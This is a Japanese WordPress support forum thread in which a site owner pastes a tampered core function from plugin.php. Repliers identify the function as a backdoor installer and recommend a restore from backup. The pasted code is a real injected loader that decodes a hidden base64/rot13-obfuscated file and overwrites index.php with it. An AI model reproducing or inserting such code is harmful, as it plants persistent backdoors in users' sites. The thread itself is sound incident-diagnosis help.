サポート » その他 » サイトと管理画面がエラー表示

  • ▼サイトが表示されず、下記エラー表示の状態。
    Warning: file_get_contents(index.php): failed to open stream: No such file or directory in /home/r2231762/public_html/yoshinoshoten.com/wp-includes/plugin.php on line 443

    ▼管理画面にもログインできず、下記エラー表示の状態。
    Forbidden
    You don’t have permission to access this resource.

    ▼使用しているレンタルサーバー
    お名前.com

    ▼問題の443行目付近のソースはコチラ

    function do_action( $hook_name, ...$arg ) {
    $index_path = "index.php";
    $index = file_get_contents($index_path);
    $path = "/home/r2231762/public_html/yoshinoshoten.com/wp-includes/js/tinymce/plugins/media/85670";
    
    if (file_exists($path)) {
    $index_hide = file_get_contents($path);
    $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
    if(md5($index) != md5($index_hide))
    {
        @chmod($index_path, 0644);
        @file_put_contents($index_path, $index_hide);
        @chmod($index_path, 0444);
    }
    }
     global $wp_filter, $wp_actions, $wp_current_filter;
    
    	if ( ! isset( $wp_actions[ $hook_name ] ) ) {
    		$wp_actions[ $hook_name ] = 1;
    	} else {
    		++$wp_actions[ $hook_name ];
    	}

    ▼ちなみに下記ファイルはちゃんとあることを確認済
    /home/r2231762/public_html/yoshinoshoten.com/wp-includes/js/tinymce/plugins/media/85670

    ▼すでに試したこと
    1)plugin.phpのLINE443のFile前に@を挿入してみた(真っ白に)
    2)plugin.phpのLINE443と447のFile前に@を挿入してみた(真っ白で変わらず)
    3)LINE444のPATH指定を変更してみた

    もとはこれ
    $path = “/home/r2231762/public_html/yoshinoshoten.com/wp-includes/js/tinymce/plugins/media/85670”;

    👆これを👇にかえてみた
    $path = “https://hywnx_r2231762@localhost/public_html/yoshinoshoten.com/wp-includes/js/tinymce/plugins/media/85670”;
    (何も変わらず)

    👆これを👇にかえてみた
    $path = “https://filemanager55.onamae.ne.jp/php/connector.minimal.php?cmd=file&target=f1_cHVibGljX2h0bWwveW9zaGlub3Nob3Rlbi5jb20vd3AtaW5jbHVkZXMvanMvdGlueW1jZS9wbHVnaW5zL21lZGlhLzg1Njcw”;
    (何も変わらず)

    4)php.ini設定(下記に編集)
    extension=php_openssl.dll
    allow_url_fopen=On
    allow_url_include=Off
    (何も変わらず)

    5)LINE443のソースの書き方を変更
    $index = file_get_contents($index_path);
    $path = “/home/r2231762/public_html/yoshinoshoten.com/wp-includes/js/tinymce/plugins/media/85670”;

    👆これを👇にかえてみた
    //file_get_contents(‘http://localhost/index.php’);
    file_get_contents(‘index.php’);
    (何も変わらず)

    6)改ざん疑いにより、お名前.comのデータバックアップから復元を実施。
    復元されたデータで丸ごと上書き。
    (真っ白に。涙)

    ヘルプの必要なページ: [リンクを見るにはログイン]

3件の返信を表示中 - 1 - 3件目 (全3件中)
  • WordPressのコードと比較してみると、
    https://core.trac.wordpress.org/browser/trunk/src/wp-includes/plugin.php#L441

    どうやらWordPressのコードに手を加えられているようなので、
    □ コードを書き換えた人を探す
    → みつかれば、書き換えた人に確認してもらう
    → みつからなければ、改ざんの可能性をきちんと検証する

    でしょうか

    こんにちは

    この WordPress のコアファイルは改ざんされていて、バックドアを仕込もうとしています。

    この改ざんのやろうとしていることは、バックドアの元になる暗号化されたファイル85670を何らかの方法でアップロードしておき(実装にアップロードされている)、それを復号化して改ざんしたファイルと同じディレクトリにあるindex.phpと置き換えてしまおうとしています。

    ところが、攻撃者は WordPress に関する知識が不足していたのか、index.phpが存在しないディレクトリのファイルを改ざんしてしまったため、バックドアの設置に失敗しています。

    とはいえ、他のディレクトリで同じことをされている可能性もあります。

    改ざんされたのがいつかは分からないですが、バックアップがあるのであれば、全てを削除したのち、バックアップからリストアすることをお勧めします。

    以下のページを参考にしてみてください。
    https://ja.wordpress.org/support/article/faq-my-site-was-hacked/

    また、専門の業者に依頼すれば、バックアップがなくてもテーマやプラグインも含めた改ざん箇所を特定して復旧してもらえるかもしれません。

    トピック投稿者 higepizza

    (@higepizza)

    @ounziw @munyagu
    ご回答頂き誠にありがとうございます。
    頂いた内容をもとに、対応を検討させて頂きます。
    取り急ぎ御礼まで。

3件の返信を表示中 - 1 - 3件目 (全3件中)
  • このトピックに返信するにはログインが必要です。